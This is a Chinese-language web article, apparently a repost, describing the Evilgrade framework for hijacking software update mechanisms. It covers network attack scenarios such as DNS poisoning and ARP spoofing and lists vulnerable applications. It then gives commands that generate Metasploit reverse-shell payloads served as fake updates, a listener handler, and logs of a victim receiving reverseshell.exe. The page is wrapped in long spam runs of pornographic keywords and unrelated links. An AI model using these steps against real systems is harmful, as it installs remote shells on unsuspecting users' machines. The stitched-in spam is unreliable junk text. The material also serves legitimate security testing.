精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

如何使用Evilgrade測試應用程序的升級機制是否安全

安全 數據安全
Evilgrade是一款功能強大的模塊化框架,該框架允許廣大研究人員通過向目標應用程序注入偽造的更新代碼,并利用存在安全問題的更新實現機制來測試目標升級更新功能的安全性。該工具提供了預構建的代理以及支持快速測試的默認工作配置。

關于Evilgrade

Evilgrade是一款功能強大的模塊化框架,該框架允許廣大研究人員通過向目標應用程序注入偽造的更新代碼,并利用存在安全問題的更新實現機制來測試目標升級更新功能的安全性。該工具提供了預構建的代理以及支持快速測試的默認工作配置。除此之外,該工具還擁有自己的WebServer和DNSServer模塊。

工具使用場景

內部場景

1、內部DNS訪問;

2、ARP欺騙;

3、DNS緩存投毒;

4、DHCP欺騙;

5、TCP劫持;

6、Wi-Fi訪問點偽造;

外部場景

1、內部DNS訪問;

2、DNS緩存投毒;

實現的模塊

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • ...

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/infobyte/evilgrade.git

工具使用

下面給出的是工具的幫助信息:

evilgrade>help

Type 'help command' for more detailed help on a command.

Commands:

configure - 配置模塊名稱

exit - 退出程序

help - 輸出工具幫助信息

reload - 重新加載并更新所有模塊

restart - 重啟Web服務器

set - 配置變量

show - 顯示對象信息

start - 開啟Web服務器

status - 獲取Web服務器窗臺

stop - 停止Web服務器

version - 顯示框架版本



Object:

options - 顯示當前模塊的選項

vhosts - 顯示當前模塊的VirtualHosts

modules - 列舉所有可用的模塊

active - 顯示活動模塊

列舉實現的模塊:

evilgrade>show modules



List of modules:

===============



...

...

...



- 63 modules available.

配置指定模塊:

evilgrade>conf sunjava

evilgrade(sunjava)>

開啟服務(DNS服務器和WebServer):

evilgrade>start

evilgrade>

[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade>

[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...



#### Waiting for victims



evilgrade>

[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"

evilgrade>

[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"

evilgrade>

[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"

evilgrade>

[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

顯示狀態和日志:

evilgrade>show status

Webserver (pid 4134) already running



Users status:

============



.---------------------------------------------------------------------------------------------------------------.

| Client | Module | Status | Md5,Cmd,File |

+----------------+------------------+--------+------------------------------------------------------------------+

| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |

'----------------+------------------+--------+------------------------------------------------------------------'

工具高級使用

使用場景一

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

在這種情況下,對于每個所需的更新二進制文件,我們都可以使用 "windows/shell_reverse_tcp"這個Payload來生成偽造的更新代碼,同時使用一個反向Shell連接到192.168.233.2:4141。<%OUT%><%OUT>標簽專門來檢測輸出二進制文件的生成位置。

比如說,如果我們運行下列命令:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

那么每當我們收到一個二進制請求時,Evilgrade將編譯該行并執行最終字符串"./generatebin -o /tmp/update(random).exe",然后生成不同的代理。

使用場景二

在Evilgrade外運行:

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

在Evilgrade內運行:

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

生成好Payload之后,我們將得到多個處理器Handler來監聽之前分配的LHOST:

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E

[*] Started reverse handler on 192.168.100.2:4444

[*] Starting the payload handler...

項目地址

Evilgrade:【GitHub傳送門】

參考資料

http://www.faradaysec.com/

責任編輯:武曉燕 來源: FreeBuf.COM??
相關推薦

2022-12-22 08:01:09

Vue測試庫測試

2023-08-11 07:59:15

2022-02-21 14:41:21

APIWeb安全

2011-08-05 09:59:54

2009-07-03 06:57:32

2010-12-27 17:04:07

應用程序版本升級

2009-08-27 11:40:43

ibmdw云計算

2022-06-22 09:00:00

安全編程語言工具

2014-02-19 15:38:42

2013-11-19 15:35:01

2009-12-21 09:54:54

Web應用程序安全測試

2010-08-02 23:20:24

2021-07-20 09:44:34

云原生應用程序安全云安全

2009-07-01 18:24:59

JSP應用程序JMeter

2013-10-31 10:44:54

IDE工具

2012-05-29 10:04:08

2011-02-13 14:36:35

2013-02-18 16:12:55

2023-06-28 07:21:51

KoodousFinAPI密鑰

2009-12-16 15:39:37

Visual Stud
點贊
收藏

51CTO技術棧公眾號

成人在线观看免费高清| 北条麻妃在线视频观看| 国内精品偷拍视频| 99精品福利视频| 亚洲欧美日本精品| 久久久久xxxx| 大桥未久在线视频| 国产欧美一区视频| 懂色中文一区二区三区在线视频| 久久精品无码av| 欧美激情aⅴ一区二区三区| 日韩激情视频在线播放| 亚洲午夜精品一区| 中文在线最新版地址| 亚洲色图在线播放| 欧美日韩成人一区二区三区| 国产又粗又大又爽| 99成人在线| 精品国内自产拍在线观看| 久久久老熟女一区二区三区91| 欧美日韩亚洲国产| 亚洲va韩国va欧美va| 日日噜噜噜夜夜爽爽| 色鬼7777久久| 国产成人av网站| 国产精品手机播放| 国产成人精品片| 希岛爱理av一区二区三区| 亚洲欧美一区二区精品久久久| 亚洲制服在线观看| 福利一区二区| 日本韩国欧美三级| 久操网在线观看| fc2ppv国产精品久久| 中文无码av一区二区三区| 日韩色性视频| 粉嫩老牛aⅴ一区二区三区| 中文字幕精品—区二区日日骚| 男操女在线观看| 国产精品资源网| 成人免费高清完整版在线观看| 99久久久无码国产精品免费蜜柚| 亚洲黄色一区| 欧美日产国产成人免费图片| 日本爱爱小视频| 欧美日韩水蜜桃| 亚洲欧洲在线看| 香港三级日本三级| 粉嫩久久久久久久极品| 精品少妇一区二区三区| 午夜免费福利网站| 国产午夜亚洲精品一级在线| 欧美巨大另类极品videosbest| 黄色三级视频片| 国产精品高清乱码在线观看| 色综合久久天天综合网| 欧美 日韩 国产一区| 在线天堂新版最新版在线8| 偷偷要91色婷婷| 成人一区二区免费视频| sm在线播放| 精品福利一区二区| 丰满人妻中伦妇伦精品app| 交100部在线观看| 精品露脸国产偷人在视频| www.av片| 三上悠亚一区二区| 欧美亚洲综合另类| 手机免费看av网站| 日韩一二三区在线观看| 亚洲白拍色综合图区| 欧美夫妇交换xxx| 日韩大尺度在线观看| 日韩电影第一页| 黄色aaa视频| 欧美色蜜桃97| 久久婷婷国产麻豆91天堂| 少妇久久久久久被弄高潮| 欧美日韩国产精品一区二区亚洲| 欧美激情视频一区二区| 日韩精品久久久久久久| 久久婷婷久久| 成人www视频在线观看| 国产精品一级二级| 成熟亚洲日本毛茸茸凸凹| 精品一区二区不卡| av国产在线观看| 一区二区三区国产精品| 欧美 日韩精品| 视频欧美精品| 日韩av在线网址| 少妇视频在线播放| 欧美黄色aaaa| 欧美中文字幕在线播放| 这里只有精品999| 国产激情视频一区二区在线观看| 久久天天狠狠| 国产在线激情视频| 色综合中文综合网| 一级日本黄色片| 日韩av资源网| 久久九九国产精品怡红院| 国偷自拍第113页| 麻豆成人久久精品二区三区红 | 超碰在线视屏| 在线中文字幕不卡| 性生交大片免费看l| 亚洲区小说区图片区qvod按摩| 色噜噜久久综合伊人一本| 欧美人与禽zozzo禽性配| 日韩专区欧美专区| 国产精品一区二区三区观看| 成人精品一区二区三区免费 | 中文字幕一区二区三区精品| 日本在线观看不卡视频| 国产精品区免费视频| 成人欧美亚洲| 精品福利在线视频| 手机看片国产精品| 91亚洲自偷观看高清| 欧美在线视频网站| 粉嫩av一区二区夜夜嗨| 中文字幕一区二区三区乱码在线 | 9lporm自拍视频区在线| 欧美日韩一区成人| 91精彩刺激对白露脸偷拍| 在线国产日韩| 2022国产精品| 老司机av在线免费看| 欧美亚洲高清一区| 丰满少妇一区二区| 99精品免费视频| 成人av电影免费| 操你啦视频在线| 欧美色图在线观看| 变态另类ts人妖一区二区| 9国产精品视频| 高清视频在线观看一区| 在线电影福利片| 91精品国产欧美日韩| 欧洲美女女同性互添| 老鸭窝一区二区久久精品| 日本一区二区三区www| 欧美极度另类| 亚洲欧洲一区二区三区久久| 日韩精品久久久久久免费| 91蜜桃免费观看视频| 国产综合av在线| 里番精品3d一二三区| 5252色成人免费视频| 日韩一级片免费在线观看| 亚洲大片一区二区三区| 亚洲一二三四五| 日韩午夜在线| 久久久久无码国产精品一区| 天堂在线中文网官网| 亚洲女人天堂网| 毛片在线免费播放| 国产精品久久久久一区二区三区共 | 色婷婷av久久久久久久| 国产毛片久久久久久久| 日韩电影在线一区| 在线不卡视频一区二区| 国产精品一区二区三区av | 亚洲成人精品视频| 国产成人精品av久久| 91在线视频免费观看| 97视频在线免费播放| 精品视频亚洲| 成人精品一区二区三区电影免费| 国产原创视频在线观看| 精品国产一区二区在线观看| 五月婷婷开心网| 国产欧美精品国产国产专区| 日本精品一区在线| 国产一区二区三区四区老人| 精品国产一区二区三区日日嗨| 视频在线日韩| 美女性感视频久久久| 亚洲欧美综合一区二区| 欧美日韩日本视频| 好吊色视频在线观看| 久久综合久久久久88| 亚洲人视频在线| 在线观看一区视频| 亚洲国产欧美不卡在线观看 | 欧美一区二区播放| 日本熟女一区二区| 国产精品免费久久久久| 性色av浪潮av| 日韩二区三区四区| 日韩在线视频在线| 国产欧美日韩精品一区二区免费| 成人激情视频小说免费下载| av成人 com a| 久久精品电影网| 日韩欧美电影在线观看| 欧美高清视频不卡网| 日韩伦人妻无码| 国产精品久久久久久久久晋中| 亚洲图片欧美另类| 美女在线视频一区| 亚洲不卡中文字幕无码| 午夜精品视频一区二区三区在线看| 精品一区二区三区自拍图片区| 色诱色偷偷久久综合| 4444欧美成人kkkk| 亚洲无线看天堂av| 伊人久久综合97精品| 国产成人三级在线观看视频| 欧美日韩成人在线| 可以在线观看av的网站| 一区二区三区免费| 永久免费看片视频教学| 久久女同互慰一区二区三区| 国产精品果冻传媒| 国产麻豆欧美日韩一区| 无人在线观看的免费高清视频| 99在线|亚洲一区二区| 佐佐木明希av| 日韩av片子| 日韩激情视频| 亚洲欧美校园春色| 精品国产一区二区三区日日嗨| 亚洲综合影院| 成人激情在线播放| 国产黄色精品| 国产精品电影久久久久电影网| 欧美aaaaa性bbbbb小妇| 欧美黄色成人网| 中文在线观看免费| 久久精品福利视频| 午夜不卡视频| 一本一本久久a久久精品牛牛影视 一本色道久久综合亚洲精品小说 一本色道久久综合狠狠躁篇怎么玩 | 国产日韩三级在线| 亚洲欧美色图视频| 99久久777色| 久久性爱视频网站| 国产成人一级电影| 永久av免费在线观看| 黑人巨大精品欧美一区| 一起操在线视频| 精品在线一区二区| 男女视频在线观看网站| 九九**精品视频免费播放| 亚洲涩涩在线观看| 久久精品理论片| 美女在线视频一区二区| 蜜桃视频在线一区| 91 在线视频观看| 狠狠色丁香久久婷婷综合_中 | 国产精品人人人人| 富二代精品短视频| 男人午夜免费视频| 91国产成人在线| 中文字幕在线观看高清| 欧美日产在线观看| 99久久久国产精品无码网爆| 日韩一区二区在线免费观看| 亚洲国产精品一| 亚洲电影免费观看高清完整版在线观看 | 久久成人18免费观看| 天天做天天干天天操| 国产精品自拍网站| 97人妻精品一区二区三区免费| 成人精品国产一区二区4080| 成人在线视频免费播放| 久久先锋影音av| 国产7777777| 亚洲免费视频成人| 日本少妇在线观看| 欧美亚洲尤物久久| 国产内射老熟女aaaa∵| 精品国产伦一区二区三区观看体验| 天天操天天干天天插| 国产亚洲精品久久久久久牛牛| av在线免费观看网站| 九九视频这里只有精品| 亚洲少妇视频| 国产日韩亚洲欧美| 中文字幕久久精品一区二区| 久久99精品久久久久久久青青日本| 精品国产一区二区三区| 先锋影音男人资源| 亚洲影视在线| 日韩欧美理论片| 99re热视频精品| 日本激情视频一区二区三区| 亚洲福利视频三区| 五月天中文字幕| 日韩精品一区二区三区蜜臀| 欧美日韩视频精品二区| 欧美成人性色生活仑片| 成人自拍av| 99久久一区三区四区免费| 国产真实有声精品录音| 2021国产视频| 久久五月激情| 中文字幕99页| 国产精品私人影院| 国产欧美日韩另类| 91精品国产综合久久香蕉的特点| 欧美男男激情freegay| 欧美成人综合| 成人免费福利在线| 九九亚洲视频| 国产肉体ⅹxxx137大胆| 奇米精品一区二区三区在线观看 | 国产爆乳无码一区二区麻豆| 三级欧美在线一区| 日本久久久久久久久久| 中文字幕视频一区| 国产成人无码av| 亚洲第一网站男人都懂| 1区2区在线观看| 国产精品丝袜白浆摸在线| 丁香综合av| 免费看黄色a级片| 久久99久久99| 欧美一区二区三区粗大| 日本国产一区二区| 亚洲 另类 春色 国产| 欧美国产欧美亚洲国产日韩mv天天看完整| 欧美xnxx| 欧美一区二区三区在线播放 | 7777kkkk成人观看| 亚洲网一区二区三区| 熟女熟妇伦久久影院毛片一区二区| 日韩中文字幕91| 欧美日韩高清丝袜| 午夜精品视频在线观看| 亚洲国产成人精品一区二区三区| 日韩在线观看免费全| 91天天综合| 日韩av高清| 日韩在线观看一区二区| 日韩av在线看免费观看| 富二代精品短视频| 青青草av免费在线观看| 欧美亚洲成人xxx| 日韩欧美天堂| 国产男女在线观看| 久久久久99精品国产片| 天堂а√在线中文在线新版| 亚洲美女黄色片| 欧美亚洲大片| 色爱区成人综合网| 日日夜夜精品视频天天综合网| 一色道久久88加勒比一| 在线视频观看一区| porn视频在线观看| 国产拍精品一二三| 天天超碰亚洲| 亚洲av无一区二区三区久久| 亚洲精品国产第一综合99久久 | 久久色中文字幕| 一级片在线观看免费| 国产一区二区久久精品| 国产欧美自拍| 黄色免费高清视频| 成人精品gif动图一区| 日韩在线视频免费播放| 亚洲少妇激情视频| 欧美日韩破处视频| 国产 国语对白 露脸| av在线不卡免费看| 无码人妻丰满熟妇精品区| 最近更新的2019中文字幕| 成人在线分类| av在线播放亚洲| 欧美激情一区二区三区四区| 国产精品爽爽久久| 久久久亚洲网站| 欧美人妖在线| 日本r级电影在线观看| 精品久久久中文| 中文字幕日本在线| av一区二区三区免费| 久久激情婷婷| wwwav国产| 亚洲精品中文字| 国外成人福利视频| 2018中文字幕第一页| 国产亚洲成年网址在线观看| 91av久久久| 欧美亚洲在线播放| 久久久久av| 国产男男chinese网站| 91麻豆精品国产自产在线| 2021天堂中文幕一二区在线观| 五月天亚洲综合情| 国产sm精品调教视频网站| 国产视频91在线| 成人精品鲁一区一区二区| 九九视频精品在线观看| 亚洲免费av在线| 蜜桃视频在线免费| 97欧洲一区二区精品免费| 日本免费在线视频不卡一不卡二| 激情综合五月网|